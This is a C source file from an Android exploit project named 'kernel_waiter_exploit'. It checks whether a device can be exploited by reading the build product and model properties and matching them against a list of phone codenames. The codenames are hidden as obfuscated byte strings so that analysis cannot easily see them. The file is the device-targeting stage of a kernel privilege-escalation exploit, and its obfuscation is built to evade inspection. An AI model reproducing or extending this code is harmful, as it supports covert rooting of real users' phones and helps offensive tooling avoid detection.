selinux_native/jni/kernel_waiter_exploit/check.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <sys/system_properties.h>
#include "log.h"
#include "waiter_exploit.h"
unsigned char mako[] = "\xec\x3e\xd6\x81\xf5\xfb\xff"; // "mako"
unsigned char m7[] = "\x2a\x85\xad\x49\x27"; // "m7"
unsigned char hammer[] = "\xa5\x56\xf9\x75\x4c\x48\x48\x40\x7b\x75\x40\x4c\x41"; // "hammerhead"
unsigned char grouper[] = "\x84\xd8\x5b\x63\x16\x1b\x11\x14\x61\x16"; // "grouper"
unsigned char huawei[] = "\xd8\x09\xd9\x83\xff\xfd\xf8\xf7\x9f\xf8\xf8"; // "Y530-U00"
unsigned char hua_g6[] = "\x29\xdc\xf3\x96\x27\x3c\x84\x28\x29"; // "G6-U10"
unsigned char g2[] = "\x5a\x09\x51\x4f\x78"; // "g2"
unsigned char lg_l90[] = "\x3b\x27\x1f\x54\x14\x5b"; // "w7n"
//unsigned char s4mini[] = "\xc0\xfd\x37\x4d\x5f\x52\x52\x63\x56\x51\x54\x4c\x5f"; // "serranolte"
unsigned char xp_m2[] = "\x99\x7d\xe1\x27\x55\x5a\x5b\x5a"; // "D2303"
unsigned char cancro[] = "\x7d\x03\x78\x22\x1c\x15\x22\x11\x16"; // "cancro"
unsigned char s5_klte[] = "\x2a\xf6\xd8\xc1\xca\xa2\xb3"; // "klte"
unsigned char s4_jflte[] = "\xcd\xca\x02\xbb\xbf\xa1\x49\xb8"; // "jflte"
unsigned char tab2[] = "\x25\x42\x63\xd1\x15\x1a\xc6"; // "t03g"
unsigned char m0[] = "\x0b\x11\x18\x66\x5d"; // "m0"
unsigned char s_grand[] = "\xcd\x8d\x4a\xb1\xb4\xb5\xb5\xbc\xbd\xa3\xbc\xcb\xb8"; // "baffinlite"
unsigned char goldfish[] = "\x61\x16\x70\x0a\x0c\x33\x0c\x3f\x08\x0e"; // "generic"
unsigned char product[] = "\x61\xff\x8e\xed\xf2\xb1\xfd\xec\xf8\xf3\xfb\xb1\xef\xed\xf2\xfb\xec\xfe\xeb"; // "ro.build.product"
unsigned char model[] = "\xed\xa0\x5d\x9f\x82\xc3\x9d\x9f\x82\x89\x98\x8e\x99\xc3\x80\x82\x89\x88\x81"; // "ro.product.model"
unsigned char *default_list[] = {
mako,
m7,
hammer,
grouper,
huawei,
hua_g6,
lg_l90,
xp_m2,
cancro,
g2
};
unsigned char *samsung_list[] = {
s5_klte,
s4_jflte
};
unsigned char *samsung_old_list[] = {
tab2,
m0
};
unsigned char *sam_grand_list[] = {
s_grand
};
unsigned char *test_list[] = {
//s4mini
};
int waiter_exploit_check_exploitability() {
char value_pr[256];
char value_md[256];
int i = 0;
__system_property_get(deobfuscate(product), value_pr);
__system_property_get(deobfuscate(model), value_md);
for(i = 0; i < (sizeof(default_list)/4); i++) {
if(strstr(deobfuscate(default_list[i]), value_pr)) {
LOGD("[CHECK] Found supported device %s\n", deobfuscate(default_list[i]));
return DEFAULT;
}
}
for(i = 0; i < (sizeof(samsung_list)/4); i++) {
if(strstr(deobfuscate(samsung_list[i]), value_pr)) {
LOGD("[CHECK] Found supported device %s\n", deobfuscate(samsung_list[i]));
return SAMSUNG;
}
}
for(i = 0; i < (sizeof(test_list)/4); i++) {
if(strstr(deobfuscate(test_list[i]), value_pr)) {
LOGD("[CHECK] Found supported device %s\n", deobfuscate(test_list[i]));
return TEST;
}
}
for(i = 0; i < (sizeof(samsung_old_list)/4); i++) {
if(strstr(deobfuscate(samsung_old_list[i]), value_pr)) {
LOGD("[CHECK] Found supported device %s\n", deobfuscate(samsung_old_list[i]));
return SAMSUNG_OLD;
}
}
for(i = 0; i < (sizeof(sam_grand_list)/4); i++) {
if(strstr(deobfuscate(sam_grand_list[i]), value_pr)) {
LOGD("[CHECK] Found supported device %s\n", deobfuscate(sam_grand_list[i]));
return SAM_GRAND;
}
}
if(strstr(deobfuscate(goldfish), value_pr)) {
LOGD("[CHECK] Found supported device %s\n", deobfuscate(goldfish));
return GOLDFISH;
}
return NO_SUPPORT;
}